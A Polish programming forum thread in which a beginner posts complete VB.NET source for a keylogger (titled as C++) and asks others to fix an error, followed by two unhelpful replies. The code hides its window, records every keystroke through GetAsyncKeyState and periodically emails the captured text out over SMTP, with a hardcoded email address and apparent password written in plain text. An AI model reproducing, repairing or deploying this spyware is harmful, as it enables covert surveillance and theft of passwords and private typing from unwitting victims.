Błąd w kl c++

Wszystkie inne tematy dotyczące programowania w C++, Visual Basic, Javie, .NET i innych nie wymienionych językach programowania.
19FalleN20
Posty: 5
Rejestracja: 28 kwie 2015, 22:30

Błąd w kl c++

Post autor: 19FalleN20 »

Witam,
otóż mam problem z keyloggerem, jestem nowym w tym temacie. W linku będzie keylogger bardzo proszę o poprawienie błędu.

Kod: Zaznacz cały

Option Strict On
Imports System.Net.Mail
Public Class Form1
Public Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal vKey As Int32) As UShort
Private Sub tmrEmail_Tick(sender As Object, e As EventArgs) Handles tmrEmail.Tick
	Try
	Dim smtpserver As New SmtpClient
	smtpserver.EnableSsl = True
	Dim mail As New MailMessage
	smtpserver.Credentials = New Net.NetworkCredential("amarikonu@gmail.com", "rikola1234")
	smtpserver.Port = 587
	smtpserver.Host = "smtp.live.com"
	mail = New MailMessage
	mail.From = New MailAddress("amarikonu@gmail.com")
	mail.To.Add("amarikonu@gmail.com")
	mail.Subject = ("New keylogger logs!")
	mail.Body = txtLogs.Text
	smtpserver.Send(mail)
	Catch ex As Exception
	Me.Close()
	End Try
End Sub
Private Sub tmrKeys_Tick(sender As Object, e As EventArgs) Handles tmrKeys.Tick
	Dim result As Integer
	Dim key As String
	Dim i As Integer
	For i = 2 To 90
		result = 0
		result = GetAsyncKeyState(i)
		If result = -32767 Then
			key = Chr(i)
			If i = 13 Then key = vbNewLine
			Exit For
		End If
		Next i
		If key <> Nothing Then
			If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then
				txtLogs.Text &= key
			Else
				txtLogs.Text &= key.ToLower
			End If
		End If
		If My.Computer.Keyboard.AltKeyDown AndAlso My.Computer.Keyboard.CtrlKeyDown AndAlso key = "H" Then
			Me.Visible = True
		End If
	End Sub
	Private Sub Form1_FormClosed(sender As Object, e As FormClosedEventArgs) Handles Me.FormClosed
		txtLogs.Text &= vbNewLine & "Keylogger stopped at: " & Now & vbNewLine
	End Sub
	Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
		Me.ShowInTaskbar = False
		Me.ShowIcon = False
		Me.Visible = False
		txtLogs.Text = "keylogger started at: " & Now & vbNewLine
	End Sub
	Private Sub txtLogs_TextChanged(sender As System.Object, e As System.EventArgs) Handles txtLogs.TextChanged
	End Sub
End Class


ss błędu:
http://iv.pl/images/60739554978254274107.png
Awatar użytkownika
F3nix
Posty: 332
Rejestracja: 28 kwie 2015, 20:51

Re: Błąd w kl c++

Post autor: F3nix »

Wątpię, że ktoś odpowie za mało użytkowników a Visual Basic jest tak popularny obecnie... że nawet ja nie znam jednego słowa kluczowego tego języka. Ale zostawiam temat dla innych, może kiedyś ktoś odnajdzie i odpowie....
Awatar użytkownika
steo
Posty: 173
Rejestracja: 30 kwie 2015, 15:05
Lokalizacja: Universe

Re: Błąd w kl c++

Post autor: steo »

Obrazek
Obrazek
Jak to się mówi... Z debilami nie dyskutuję. Ale trzeba z kimś rozmawiać? ~steo
ODPOWIEDZ